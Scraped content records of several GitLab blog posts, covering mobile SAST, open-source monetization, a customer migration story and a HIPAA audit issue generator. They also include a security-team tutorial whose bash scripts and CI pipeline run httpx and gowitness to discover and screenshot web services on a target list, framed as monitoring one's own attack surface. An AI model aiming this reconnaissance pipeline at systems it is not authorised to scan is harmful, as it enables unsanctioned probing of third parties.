Kotlin](https://github.com/MobSF/Mobile-Security-Framework-MobSF/pull/1611).\nNot only can everyone contribute at GitLab, we encourage team members to contribute to other open source projects.\n\nNote: You will have to test your changes before they can be approved. In order to do this, you must [install\nyour branch as seen here](https://mobsf.github.io/docs/#/installation).\n\n## Adding your own scanners\n\nGitLab allows for lots of extensibility. Using our [integration guidance](https://docs.gitlab.com/ee/development/integrations/secure.html), you can bring your own scanners into the\nmerge request pipeline and the security dashboards. This was done for MobSF SAST, as well as the [WhiteSource\nDependency Scanner](/blog/whitesource-for-dependency-scanning/).\n\nI hope you enjoyed this blog post. Now you can start making your Android applications more secure.\nYou can reach out on Twitter and share your thoughts with us [@GitLab](https://twitter.com/gitlab)!\n",[865,685,1099,231,9],{"slug":3930,"featured":6,"template":689},"mobile-static-application-security-testing-for-android","content:en-us:blog:mobile-static-application-security-testing-for-android.yml","Mobile Static Application Security Testing For Android","en-us/blog/mobile-static-application-security-testing-for-android.yml","en-us/blog/mobile-static-application-security-testing-for-android",{"_path":3936,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3937,"content":3943,"config":3948,"_id":3950,"_type":14,"title":3951,"_source":16,"_file":3952,"_stem":3953,"_extension":19},"/en-us/blog/monetizing-and-being-open-source",{"title":3938,"description":3939,"ogTitle":3938,"ogDescription":3939,"noIndex":6,"ogImage":3940,"ogUrl":3941,"ogSiteName":673,"ogType":674,"canonicalUrls":3941,"schema":3942},"How GitLab makes money","Monetizing open source ≠ an 'open source' company. Our CEO Sid Sijbrandij explains how we got over the barriers to monetizing an open source company.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749678896/Blog/Hero%20Images/monetizing-os.jpg","https://about.gitlab.com/blog/monetizing-and-being-open-source","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"How GitLab makes money\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Aricka Flowers\"}],\n        \"datePublished\": \"2018-11-09\",\n      }",{"title":3938,"description":3939,"authors":3944,"heroImage":3940,"date":3945,"body":3946,"category":299,"tags":3947},[2071],"2018-11-09","\nWhile the number of businesses based on open source technology is growing exponentially, that doesn't mean a profitable open source company is truly open. Our CEO [Sid Sijbrandij](/company/team/#sytses) believes the key lies in not just being [a steward of an open source project](/company/stewardship/), but more so in being [transparent](https://handbook.gitlab.com/handbook/values/#transparency) and [collaborative](https://handbook.gitlab.com/handbook/values/#collaboration) – going so far as to allow the public to play a role in the way the company is run. And that’s what he’s aiming to do with GitLab:\n\n>\"We want to take it one step further, where you're not only taking open source and contributing back to that project, but you're also allowing people to contribute back to what you make – in our case GitLab – to improve the company. Sometimes people from the wider community contribute to [our handbook](/handbook/) to make improvements. I think that's really exciting. And in order for us to not create a rift between GitLab the open source project and GitLab the company, we try to work out in the public. Our strategy, our OKRs (Objectives and Key Results), all of the issues we work on are out there in the public. People can see what we're doing, and comment on it. I think that's a superpower. I'm very proud that people keep contributing to GitLab and we're working really hard to keep it that way.\"\n\n## Finding the right business model: Trial and error\n\nWhile the number of open source companies is trending up, making free software profitable is not an easy feat. Sid and co-founder and Engineering Fellow [Dmitriy Zaporozhets](/company/team/#dzaporozhets) experimented with a number of business models for GitLab before finding a formula that worked.\n\n### Donations\n\n\"Dmitriy used to talk about ice cream money, which were donations,\" Sid recalls. \"They were seven bucks a month, so he and his wife could buy ice cream once a month from the donations. We tried that and got up to $1,000 in the most profitable month after having a big drive. But that wasn't sustainable to run a company with multiple employees.\"\n\n### Feature request fees and paid support\n\nThey also tried charging a fee to build requested features from users. But that model fell apart when people found out there were others making the same request and, instead of paying for a fraction of the feature, dropped their order with the expectation that another user or company would pay for it. Sid and Dmitriy then moved to a support model, but found it to be a catch-22. As they improved the product, fewer people needed support. But to do a less-than-stellar job in the installation of GitLab \"kind of destroys\" the brand, Sid says.\n\n### Open core\n\n\"In the end, we settled on [open core](/blog/gitlab-is-open-core-github-is-closed-source/), where [some features are paid](/pricing/). The hard thing was deciding which features are paid. I think after many years we now have a good way to determine that. The feature aimed at an individual contributor, it's open source. If it's aimed at a manager, it's in Starter. If it's aimed at a director, it's in Premium. And if it's aimed at a C-level exec, it's in Ultimate. That brings a lot of clarity and it seems to work really well, but it took us a while to figure that one out.\"\n\n## What’s next\n\nTo continue engaging with and growing GitLab’s presence in the open source community, Sid plans to open the company’s summit to the wider community. The [next summit](/events/gitlab-contribute/), which occurs every nine months, is set to include about 100 community members and customers, and that figure is expected to grow in the future.\n\nWe’re also giving folks a view into our operations via more videos and plan to open our books for all to see as soon as we can.\n\n\"We’re doing more live streaming and putting recordings up on [YouTube](https://www.youtube.com/c/gitlab),\" Sid says. \"I think we're at over 400 videos now, but anything we have, it doesn't matter what the quality is, we want to post it for people to consume. I'm really excited at what's happening there.\n\n\"Another thing I look forward to doing is being more open about our financials. We plan and hope to be a public company one day, and then we will be open about our financials every quarter. As soon as we have audited financials, we'll start doing those calls, even when we're still a private company.\"\n\n[Cover image](https://unsplash.com/photos/Xaanw0s0pMk) by [Jason Leung](https://unsplash.com/@ninjason) on Unsplash\n{: .note}\n",[803,9],{"slug":3949,"featured":6,"template":689},"monetizing-and-being-open-source","content:en-us:blog:monetizing-and-being-open-source.yml","Monetizing And Being Open Source","en-us/blog/monetizing-and-being-open-source.yml","en-us/blog/monetizing-and-being-open-source",{"_path":3955,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3956,"content":3962,"config":3967,"_id":3969,"_type":14,"title":3970,"_source":16,"_file":3971,"_stem":3972,"_extension":19},"/en-us/blog/monitor-web-attack-surface-with-gitlab",{"title":3957,"description":3958,"ogTitle":3957,"ogDescription":3958,"noIndex":6,"ogImage":3959,"ogUrl":3960,"ogSiteName":673,"ogType":674,"canonicalUrls":3960,"schema":3961},"Monitor your web attack surface with GitLab CI/CD and GitLab Pages","Use this tutorial to build an automated web application screenshot report.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749682233/Blog/Hero%20Images/aleks-dahlberg-glass-unsplash.jpg","https://about.gitlab.com/blog/monitor-web-attack-surface-with-gitlab","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Monitor your web attack surface with GitLab CI/CD and GitLab Pages\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Chris Moberly\"}],\n        \"datePublished\": \"2023-01-11\",\n      }",{"title":3957,"description":3958,"authors":3963,"heroImage":3959,"date":3964,"body":3965,"category":865,"tags":3966},[2541],"2023-01-11","\n\n_DISCLAIMER: We believe that understanding the tactics and techniques of both attackers and defenders is key to keeping our organization secure. It's important to note that GitLab security blog posts are for informational purposes only, not to provide specific security advice._\n\nAttackers love insecure web applications. Lucky for them, these applications are everywhere! Test environments, development instances, default installations with hardcoded passwords - you name it, it's out there somewhere waiting to be exploited.\n\nThe easier it becomes to deploy resources in the cloud, the more of these insecure web applications end up exposed to hacking and/or unintended access. You can get ahead of potential threats by proactively identifying and reviewing your own web application attack surface.\n\nIn this tutorial, we'll explain how you can monitor the web applications in your environment by generating a screenshot report using GitLab CI/CD, GitLab Pages, and a handful of free and open source security tools. You'll end up with a fully automated solution that can:\n\n- Identify web services on a list of addresses you own.\n- Capture screenshots of these web services.\n- Build an authenticated web portal for you to visually see each site that was discovered.\n\n## Building the solution\n\n### Start with a project\n\nInside the GitLab web interface, [create a blank project](https://gitlab.com/projects/new#blank_project). The default settings should be fine, but you should review to confirm that the default settings are appropriate. Pay particular attention to the \"Visibility Level\" - you may want to set this to private.\n\n![Creating a GitLab project](https://about.gitlab.com/images/blogimages/2023-01-17-monitor-web-attack-surface-with-gitlab/screenshot-create-project.png){: .shadow.medium.center}\n\n\n\n### Write the automation scripts\n\nWe'll use three scripts in this project:\n\n-  `setup.sh`: Install the required tooling.\n- `discover-services.sh`: Identify web services using [httpx](https://github.com/projectdiscovery/httpx).\n- `take-screenshots.sh`: Use [gowitness](https://github.com/sensepost/gowitness) to generate a static website containing screenshots of each identified web service.\n\nThe HTML generated by gowitness will be placed into the `public` folder, which is used by [GitLab Pages](https://docs.gitlab.com/ee/user/project/pages/) to generate a website you can click through to review the findings.\n\nEach script will generate output files which may be useful for additional analysis. These will be made available as GitLab [job artifacts](https://docs.gitlab.com/ee/ci/pipelines/job_artifacts.html), so that you can download and review them at will.\n\nTo complete this step, first create a new folder in your project called `scripts`. Then, add the following files into that folder:\n\n#### setup.sh\n\n```bash\n#!/bin/bash\n\n# create folder for downloaded binaries\nmkdir bin\n\n# install general pre-reqs\napt -qq update > /dev/null\napt -qq install -y wget unzip > /dev/null\n\n# install pre-reqs for gowitness\napt -qq install -y chromium > /dev/null\n\n# download tools\nwget -q https://github.com/projectdiscovery/httpx/releases/download/v1.2.5/httpx_1.2.5_linux_amd64.zip\nwget -q https://github.com/sensepost/gowitness/releases/download/2.4.2/gowitness-2.4.2-linux-amd64\n\n# unzip / move all relases to bin folder\nunzip httpx_1.2.5_linux_amd64.zip -d bin/\nmv gowitness-2.4.2-linux-amd64 bin/gowitness\nchmod u+x bin/gowitness\n```\n\n#### discover-services.sh\n\n```bash\n#!/bin/bash\n\n# You may want to dynamically generate a target file with each run.\n# For this demo, we are using a list defined inside project CI variables.\nTARGETS=$TARGET_FILE\n\n# create output directory\nmkdir ./targets\n\n# Identify web services\necho \"Identifying web services across $(cat \"$TARGETS\" | wc -l) targets...\"\ncat \"$TARGETS\" | bin/httpx -o targets/web-services.txt -p 80,443\n\necho \"Discovered $(cat targets/web-services.txt | wc -l) web services.\"\n```\n\n#### take-screenshots.sh\n\n```bash\n#!/bin/bash\n\n# Run gowitness\nbin/gowitness file -f targets/web-services.txt\nbin/gowitness report export -f report.zip\n\n# Move the report to pages outdir\nunzip report.zip\nmv gowitness public\n```\n\n\n\n### Set up the pipeline\n\nNext, we need to create the `.gitlab-ci.yml` file where we configure all of these scripts to run inside a [pipeline](https://docs.gitlab.com/ee/ci/pipelines/). Create this file in the root of the project with the following contents:\n\n```yaml\nstages:\n  - scan\n  - deploy\n\nscanner:\n  image: debian:bullseye\n  stage: scan\n  script:\n  - bash ./scripts/setup.sh\n  - bash ./scripts/discover-services.sh\n  - bash ./scripts/take-screenshots.sh\n  only:\n  - schedules\n  - web\n  artifacts:\n    paths:\n    - targets\n    - public\n\npages:\n  stage: deploy\n  script:\n  - echo \"\" # do nothing\n  only:\n  - schedules\n  - web\n  artifacts:\n    paths:\n    - public\n```\n\nThis file defines a pipeline with two stages:\n\n- The first stage (`scan`) runs all three scripts we created. This will generate a static website inside a folder called `public`.\n- The second stage (`deploy`) is required for GitLab Pages to work - this is where the static site is published on a publicly-accessible URL that can be configured to require GitLab authentication.\n\nYou can see we've added an `only` condition to both of these stages. This ensures that the tool doesn't run every time you make a change to the code - it runs only on a defined schedule or when you manually choose to run it via the web UI.\n\n### Define your targets\n\nYou may have noticed the `TARGETS_FILE` variable inside the `discover-services.sh` script from earlier. That's a [file variable](https://docs.gitlab.com/ee/ci/variables/#cicd-variable-types) that will contain the targets you wish to scan. Defining this as a variable allows us to create a generic, portable project that can be forked and cloned without containing any specific targets.\n\nTo add some targets to your project, go to \"Settings -> CI/CD -> Variables\" and click the \"Add variable\" button. Enter `TARGET_FILE` for the \"Key\" and fill in one host name or IP address per line in the \"Value\" section. Make sure to add a blank line to the end of the list - this is required for the scripts to run correctly.\n\n![Creating a CI environment variable](https://about.gitlab.com/images/blogimages/2023-01-17-monitor-web-attack-surface-with-gitlab/screenshot-create-variable.png){: .shadow.center}\n\n\nWe run a similar version of this screenshot tool internally, and we generate this file dynamically by exporting all of our public addresses from our various cloud environments. If you decide to implement something like that, we'd recommend adding an additional stage to your `.gitlab-ci.yaml` file.\n\n### Schedule and run the pipeline\n\nGitLab projects have a built-in [scheduler](https://docs.gitlab.com/ee/ci/pipelines/schedules.html) that lets you automatically run pipelines at specific dates/times. You can access this inside your project at \"CI/CD -> Schedules\". Here, we'll create a new schedule to run once a week on Monday mornings.\n\n![Creating a CI schedule](https://about.gitlab.com/images/blogimages/2023-01-17-monitor-web-attack-surface-with-gitlab/screenshot-schedule.png){: .shadow.center}\n\n\nAfter saving the schedule, you can also choose to manually run the pipeline by clicking the play button shown below. If you are following along, go ahead and do this now.\n\n![Running a CI schedule](https://about.gitlab.com/images/blogimages/2023-01-17-monitor-web-attack-surface-with-gitlab/screenshot-play.png){: .shadow.center}\n\n\nYou can follow the progress of your pipeline by navigating to \"CI/CD -> Pipelines\". Click on the status of the most recent pipeline. Here, you'll see the stages we configured earlier.  If all goes well, you'll see green check marks on each stage. You can click on an individual stage to watch the console logs and perform any necessary troubleshooting.\n\n![CI pipeline success icons](https://about.gitlab.com/images/blogimages/2023-01-17-monitor-web-attack-surface-with-gitlab/screenshot-success.png){: .shadow.center}\n\n\n### Enable notifications\n\nOnce you've set up a schedule, you might want to be alerted whenever a new report is ready. Luckily, GitLab has you covered here!\n\nInside your project, go to \"Settings -> Integrations -> Pipeline Status Emails\". Put your email address into the \"Recipients\" field and uncheck the box \"Notify only broken pipelines\". This will send you an email each time a pipeline completes and a new screenshot report has been published to your GitLab Pages site.\n\nGitLab offers a slew of other notifcation options as well, including things like Slack and Teams. If you prefer one of those, you can [read more in the docs](https://docs.gitlab.com/ee/integration/).\n\n![Create pipeline notifications](https://about.gitlab.com/images/blogimages/2023-01-17-monitor-web-attack-surface-with-gitlab/screenshot-notifications.png){: .shadow.center}\n\n\n### View your GitLab Pages site\n\nOnce the pipeline has completed successfully, your site should be available. You can obtain the site's public address by going to \"Settings -> Pages\".\n\nIf you set your project to be private, then by default only project members who are authenticated to the GitLab server can view the site. You can modify these settings under \"Settings -> General -> Visibility, project features, permissions -> Pages\".\n\n![Screenshot of gowitness interface](https://about.gitlab.com/images/blogimages/2023-01-17-monitor-web-attack-surface-with-gitlab/screenshot-gowitness.png){: .shadow.center}\n\n\n## Summary\n\nWeb applications are everywhere. Often, they are deployed with vulnerable configurations and are left forgotten - unmonitored and awaiting exploitation. You can build a monitoring solution using GitLab and free, open-source tools that gives you a visual overview of the web apps running in your own environment.\n\nThis blog walked you through manually setting this up yourself. You can view our example project [here](https://gitlab.com/gitlab-com/gl-security/threatmanagement/redteam/redteam-public/webapp-screenshots), which was created exactly as decribed above. Feel free to fork or clone that project as a shortcut to setting it up from scratch yourself.\n\nWe love to find creative uses for GitLab, and this is one we use ourselves internally. If you've come up with some of your own interesting use cases, we would love to hear about them! Or, if there is anything else you'd like our security team to write about, please do let us know! You can share your thoughts in the comments below or via issues and merge requests on any of our projects.\n\nThanks for reading!\n",[865,9],{"slug":3968,"featured":6,"template":689},"monitor-web-attack-surface-with-gitlab","content:en-us:blog:monitor-web-attack-surface-with-gitlab.yml","Monitor Web Attack Surface With Gitlab","en-us/blog/monitor-web-attack-surface-with-gitlab.yml","en-us/blog/monitor-web-attack-surface-with-gitlab",{"_path":3974,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3975,"content":3981,"config":3986,"_id":3988,"_type":14,"title":3989,"_source":16,"_file":3990,"_stem":3991,"_extension":19},"/en-us/blog/monkton-moves-to-gitlab-customer-story",{"title":3976,"description":3977,"ogTitle":3976,"ogDescription":3977,"noIndex":6,"ogImage":3978,"ogUrl":3979,"ogSiteName":673,"ogType":674,"canonicalUrls":3979,"schema":3980},"Monkton's journey to GitLab: Focusing on automation","Monkton is migrating from a suite of disparate tools to GitLab, enabling them to better help their customers build safe, secure mobile apps.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749670123/Blog/Hero%20Images/moving-to-gitlab-cover.png","https://about.gitlab.com/blog/monkton-moves-to-gitlab-customer-story","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Monkton's #movingtogitlab story: Going all in on automation and repeatability\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Rebecca Dodd\"},{\"@type\":\"Person\",\"name\":\"Aricka Flowers\"}],\n        \"datePublished\": \"2019-05-21\",\n      }",{"title":3982,"description":3977,"authors":3983,"heroImage":3978,"date":1936,"body":3984,"category":682,"tags":3985},"Monkton's #movingtogitlab story: Going all in on automation and repeatability",[1859,2071],"\n\nEven with all the [#movingtogitlab](/blog/movingtogitlab/) excitement last year, it never gets old to hear about folks migrating to us.\nSo when Harold Smith, CEO and co-founder of [Monkton Incorporated](https://monkton.io/) – a company dedicated to helping enterprises build safe, secure, and compliant mobile solutions – wrote about [moving Monkton to GitLab](https://medium.com/@h3smith/migration-to-gitlab-dde59fc98315) earlier this year, we asked him to sit down with us to talk about the whys and hows.\n\n## From hodge podge of tools, to consolidated lifecycle\n\n\"We’ve been using some of your competitors’ tools.\nIt sort of became a hodge podge of tools – they’re still good tools, but there are different tools to do different things in the development life cycle. We had known GitLab had existed for a while.\nAnd I think, like many others who know about GitLab, it was an assumption on our end that it's just a source control repository.\nThen we started to realize and peel back a little bit of everything GitLab does – the continuous integration, integrations with other services, the whole pipeline.\nWe really started to focus on it and say, 'This is something we should spend time looking into and investing in.'\n\n\"It turned out to be a really good investment of time – we’ve seen time savings just in our ability to watch projects, our onboarding.\nIt’s cutting out a lot of the managing of all these different tools and different servers.\nIt’s just one thing to go in and manage that does most of the work we need.\nIt's also a huge advantage for us and our customers operating under the constraints of a higher-security environment, that we're able to do continuous integration and development, secure DevOps, in a secure environment that passes their auditing needs.\n\n>It’s cutting out a lot of the managing of all these different tools and different servers.\nIt’s just one thing to go in and manage that does most of the work we need.\n\n\"A lot of tools we were using, like some of the other continuous integration tools, are all open source software, which is great.\nBut that comes with some responsibilities: you need to really dig to figure out how to manage it correctly, how to set things up.\nSo, that was probably the biggest disadvantage of working with a collection of open source tools that didn’t have the proper documentation that we needed to move forward.\nSo, once we started looking at GitLab, it really enabled us to consolidate those things.\nAll the documentation is one place. The services that were available …\nIt was really easy to figure out what we needed to do.\nAnd your support has been a big help as well in enabling us to rapidly deliver and stand up these environments.\n\n\"Before, some of our processes were manual, like uploading code scans to Fortify.\nWe’ve automated all of that now on specific branches of the software that we’re building.\nSo, it’s taken out those manual processes that had to go through the checks.\nWhen we build a mobile application and push it through the pipeline, we’re working on how can we automatically publish that to MDM.\nSo, as soon as that code is checked in, scanned, what’s the process to get that into production?\nAnd that’s where we’ve focused a lot of effort of just entirely automation.\"\n\n## Automate all.the.things.\n\n\"Our collective vision within Monkton, and working with you at GitLab, and all these other companies, is how do we automate and take out human error from the equation?\nOur goal is that the moment code is checked in and has been reviewed, the testing lifecycle, the deployment lifecycle, the security vulnerability scanning lifecycle, should all be automated.\nSo, it’s more of humans reviewing reports at the end versus humans having to do the inspections themselves. We really envisioned that these tools could do a much better job than humans can.\n\n\"We’re not trying to replace human jobs. But how can we free people up to do what people do best, versus laborious efforts like pen testing mobile applications or pen testing web applications?\nA lot of that can be automated through scripting tools – Amazon Device Farm – all of which GitLab can automate and push out.\nSo, we’re focusing on what tools can we bring in to automate that process, tie them into GitLab, and automate everything. Or virtually everything.\"\n\n## Repeatability is key\n\n\"Repeatability is probably from our vantage point, one of the cornerstones of what we have to be able to do.\nIf we have a Department of Defense customer that builds a hundred mobile apps using our software, and they discover a vulnerability in one of them – if there’s not a repeatable process to build and deliver the solutions, it would take a year to update those hundred mobile apps if they’re doing it in a very siloed environment.\nBut with a repeatable process, they could change it out once and propagate it out, they can patch and push everything within an hour.\nA repeatable process allows you to have repeatable, consistent outcomes every single time, so you know that you can trust the process as part of your security program versus maybe a hodge podge of different tools and manual processes.\"\n\n## Lessons from the migration process\n\n\"It’s been a learning opportunity for us to see what are the best practices that we can collectively share – even with you at GitLab, there might be things that we’re all collectively learning, that we can use to help the community together.\nBecause this isn’t just a proprietary company effort on our end and your end, or even our customers’ end.\nI look at it as a good learning experience for all of us to improve processes, security, compliance, and everything that goes along with that.\"\n\nHere's a bit more from our chat with Harold:\n\n\u003C!-- blank line -->\n\u003Cfigure class=\"video_container\">\n  \u003Ciframe src=\"https://www.youtube.com/embed/kT5qZ8W7yXM\" frameborder=\"0\" allowfullscreen=\"true\"> \u003C/iframe>\n\u003C/figure>\n\u003C!-- blank line -->\n\nVideo produced by [Aricka Flowers](/company/team/#arickaflowers)\n{: .note}\n",[267,231,9,910],{"slug":3987,"featured":6,"template":689},"monkton-moves-to-gitlab-customer-story","content:en-us:blog:monkton-moves-to-gitlab-customer-story.yml","Monkton Moves To Gitlab Customer Story","en-us/blog/monkton-moves-to-gitlab-customer-story.yml","en-us/blog/monkton-moves-to-gitlab-customer-story",{"_path":3993,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3994,"content":4000,"config":4006,"_id":4008,"_type":14,"title":4009,"_source":16,"_file":4010,"_stem":4011,"_extension":19},"/en-us/blog/moving-workflows-to-gitlab-the-case-of-the-hipaa-audit-protocol",{"title":3995,"description":3996,"ogTitle":3995,"ogDescription":3996,"noIndex":6,"ogImage":3997,"ogUrl":3998,"ogSiteName":673,"ogType":674,"canonicalUrls":3998,"schema":3999},"Moving workflows to GitLab: The case of the HIPAA Audit Protocol","With the GitLab API, you can easily move workflows into GitLab. Here’s how we did it for the HIPAA Audit Protocol.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749679716/Blog/Hero%20Images/bright-cardiac-cardiology.jpg","https://about.gitlab.com/blog/moving-workflows-to-gitlab-the-case-of-the-hipaa-audit-protocol","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Moving workflows to GitLab: The case of the HIPAA Audit Protocol\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Luka Trbojevic\"}],\n        \"datePublished\": \"2019-07-25\",\n      }",{"title":3995,"description":3996,"authors":4001,"heroImage":3997,"date":4003,"body":4004,"category":801,"tags":4005},[4002],"Luka Trbojevic","2019-07-25","\n\nUsing GitLab for just about everything we do, I’ve seen firsthand how powerful and effective\nit can be as a project management tool.\n\n**However, in speaking with folks about adopting GitLab for their own non-development\nworkflows, the most common roadblock I hear is the lack of specific examples.** If you're not\na developer or otherwise don't work with GitLab often, it can be hard to see how all the\nfeatures and capabilities fit together to go from an idea to a functional workflow. Because\nof this, I thought it was important to create a specific, real-world example for something most\nfolks can relate to: an audit.\n\nThe [HIPAA Audit Protocol](https://www.hhs.gov/hipaa/for-professionals/compliance-enforcement/audit/protocol/index.html)\nis published by the U.S. Department of Health & Human Services and is used by the\nOffice for Civil Rights as part of its HIPAA compliance enforcement efforts. The\nHIPAA Audit Protocol currently exists as a table on the HHS website and is most commonly turned\ninto a spreadsheet. But there are limitations and inefficiencies to working with an audit\nprotocol in a spreadsheet, as compared to GitLab:\n\n* Collaboration is challenging in a spreadsheet. With issues, robust and well-organized conversations are easy.\n* You can't upload audit protocol files directly to the spreadsheet. With issues, you can upload files directly.\n* There's no simple, clean way to maintain a full, comprehensive change history in a\nspreadsheet. With issues and merge requests, change history and logging is directly built in.\n* It can be challenging to manage due dates, milestones, and work assignments in a\nspreadsheet. With issues, those are all native features.\n\n## Introducing the HIPAA Audit Protocol Issue Generator\n\nThe HIPAA Audit Protocol Issue Generator is a simple Python script using the\n`python-gitlab` API wrapper to create issues out of every audit inquiry in the protocol.\nThe purpose of the script is to highlight how easy it is to use the GitLab API to move\nworkflows inside of GitLab and leverage GitLab's project management capabilities.\n\nThe best part? Creating this tool was really easy and simple. I started by copying the\nHTML table of the audit protocol into a CSV. Then I wrote a simple loop to go through each\nrow in the CSV and automatically create an associated issue. Note: While you can use the\nissue importer, you’d have to create a very strictly structured and formatted import file.\nWith the GitLab API, you have more flexibility and the output is easier to work with.\n\nFor your use, we’ve made\nthe [full script and a CSV of the audit protocol](https://gitlab.com/ltrbojevic/hipaa-audit-protocol-issue-generator)\navailable.\n\nHere’s what an issue looks like:\n\n![sample issue](https://about.gitlab.com/images/blogimages/HIPAA-audit-protocol-example.png){: .shadow.medium.center}\n\nAll the information you need is front and center and the issues are labeled.\n{: .note.text-center}\n\n### Customizing the issue structure\n\nFirst, it’s important to understand how we load the data from the CSV. There are different\nways to do it, but I like to assign every column in the CSV to a variable, then pass that\nvariable to the issue create API call. For this script, we have:\n\n```\naudit_type = col[0]\nsection = col[1]\nkey_activity = col[2]\nestablished_performance_criteria = col[3]\naudit_inquiry = col[4]\nrequired_addressable = col[5]\n```\n\nThat means `audit_type` is the first column, `section` is the second column, and so on.\n\nThese variables then get used in the issue create API call. For this script, we have:\n\n```\nissue = project.issues.create({'title': key_activity,\n'description': '## Established Performance Criteria' + '\\n' +\nestablished_performance_criteria + '\\n' + '## Audit Inquiry' +\n'\\n' + audit_inquiry,\n'labels': [audit_type] + [required_addressable] + [section]})\n```\n\n#### Title\n\nI decided to use the respective Key Activity of every audit inquiry. In the issue create API\ncall, it looks like this:\n\n` ‘title’: key_activity, `\n\nYou can make the title anything you want. In this case I just used a column from the CSV, but I\ncould start or end the title with some other text not in the CSV, like:\n\n` ‘title’: Any text you want:’ + ‘ ‘ key_activity, `\n\n#### Description\n\nI just used a string to manually write out the headers for the section and filled the sections\nusing the data from the CSV. In the issue create API call, it looks like this:\n\n` 'description': '## Established Performance Criteria' + '\\n' + established_performance_criteria + '\\n' + '## Audit Inquiry' + '\\n' + audit_inquiry, `\n\nNotice how I use the newline. Without the newline, all of the data would be added to the description\nright next to each other and it would be unreadable. You can add as many newlines as you want,\nand if you’re planning on doing regular editing of the issue description itself, consider\nadding two newlines to create a new paragraph so the issue description is more readable in edit mode.\n\n#### Labels\n\nLabels are very helpful for organizing, searching, filtering, and creating boards. For the labels,\nI opted to use Audit Type and Section. In the issue create API call, it looks like this:\n\n` 'labels': [audit_type] + [required_addressable] + [section] `\n\nYou can also add your own labels to the CSV by creating a new column and adding the labels you\nwant for every given row, or you can add a static label applied to all the issues by adding it\nto the API call. Make sure to keep the variables in brackets or the string will split\n(for example, instead of `Privacy` it will create a label for each letter in the word `Privacy`).\n\n#### Adding other sections\n\nYou can customize the script to add any other sections allowable by\nthe [GitLab API](https://docs.gitlab.com/ee/api/). Because we’re working with issues,\nthe [GitLab Issues API](https://docs.gitlab.com/ee/api/issues.html) documentation will be\nhelpful. The [`python-gitlab` documentation](https://python-gitlab.readthedocs.io/en/stable/index.html) is\nalso a great resource, given that this script makes use of it.\n\n## Making your own workflows in GitLab\n\nWhile in this blog post I've focused on the HIPAA Audit Protocol and the issue generator\nscript, it is also a practical, hands-on example of how simple it is to use the\nGitLab API to move any workflow to GitLab. There are two primary components:\n\n1. A data source (I prefer CSV files)\n2. A crafted API call to use the data source to bring the data into GitLab\n\nI think of the data source as the thing I want in GitLab and the crafted API call as the\nvehicle to get it into GitLab. Think of a row in your CSV as an issue and the columns as the\nthings you’re putting in the issue.\n\nWhile my specific example was the audit protocol, we can use this strategy for just about anything.\nSome examples are risk assessments, gap analyses, event planning, product launches, and more.\n\nTo adapt this script for other workflows:\n1. Start by getting your data into a CSV. Be sure to remove your headers before running the script\nbecause the script doesn’t account for column headers as is!\n2. Modify the variables and issue create API call we talked about in\nthe [Customizing the issue structure section above](#customizing-the-issue-structure) to match with your CSV and data.\n\nAnd that’s really it!\n\nAt GitLab, we use the\n[simplest and most boring solution](https://handbook.gitlab.com/handbook/values/#boring-solutions)\nto solve problems. With this approach, we were able to turn an HTML table of the HIPAA Audit Protocol\non the HHS website into a functional workflow within GitLab in just a few\nhours (including API research time and CSV formatting) and in 42 lines of code (including comments).\nTo add to that, the script can be repurposed for just about any other workflow. Plus, the script is\navailable for anyone to download, use, and modify in any way, and this blog post can serve as a\nguide on how to do that.\n\nAs a long-term solution to bring this functionality into\nGitLab as a feature, there’s also an\n[open issue to collect feedback on creating\na marketplace for issue templates](https://gitlab.com/gitlab-org/gitlab-ce/issues/62895). If you have any suggestions or comments about the marketplace\nidea, feel free to post them in the issue!\n\nHave a specific question you want answered or want to get feedback on a specific use case? Comment below!\n\n### Disclaimer\nTHE INFORMATION PROVIDED ON THIS WEBSITE IS TO BE USED FOR INFORMATIONAL PURPOSES ONLY. THE\nINFORMATION SHOULD NOT BE RELIED UPON OR CONSTRUED AS LEGAL OR COMPLIANCE ADVICE OR OPINIONS.\nTHE INFORMATION IS NOT COMPREHENSIVE AND WILL NOT GUARANTEE COMPLIANCE WITH ANY REGULATION OR\nINDUSTRY STANDARD. YOU MUST NOT RELY ON THE INFORMATION FOUND ON THIS WEBSITE AS AN\nALTERNATIVE TO SEEKING PROFESSIONAL ADVICE FROM YOUR ATTORNEY AND/OR COMPLIANCE PROFESSIONAL.\n{: .note}\n\nPhoto by [Pixabay](https://www.pexels.com/photo/bright-cardiac-cardiology-care-433267/) on [Pexels](https://www.pexels.com)\n{: .note}\n",[803,9,865],{"slug":4007,"featured":6,"template":689},"moving-workflows-to-gitlab-the-case-of-the-hipaa-audit-protocol","content:en-us:blog:moving-workflows-to-gitlab-the-case-of-the-hipaa-audit-protocol.yml","Moving Workflows To Gitlab The Case Of The Hipaa Audit Protocol","en-us/blog/moving-workflows-to-gitlab-the-case-of-the-hipaa-audit-protocol.yml","en-us/blog/moving-workflows-to-gitlab-the-case-of-the-hipaa-audit-protocol",{"_path":4013,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4014,"content":4019,"config":4023,"_id":4025,"_type":14,"title":4026,"_source":16,"_file":4027,"_stem":4028,"_extension":19},"/en-us/blog/movingtogitlab",{"title":4015,"description":4016,"ogTitle":4015,"ogDescription":4016,"noIndex":6,"ogImage":3978,"ogUrl":4017,"ogSiteName":673,"ogType":674,"canonicalUrls":4017,"schema":4018},"#movingtogitlab","People are #movingtogitlab. New users can get 75% off on Gold or Ultimate for one year.","https://about.gitlab.com/blog/movingtogitlab","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"#movingtogitlab\",\n        \"author\": 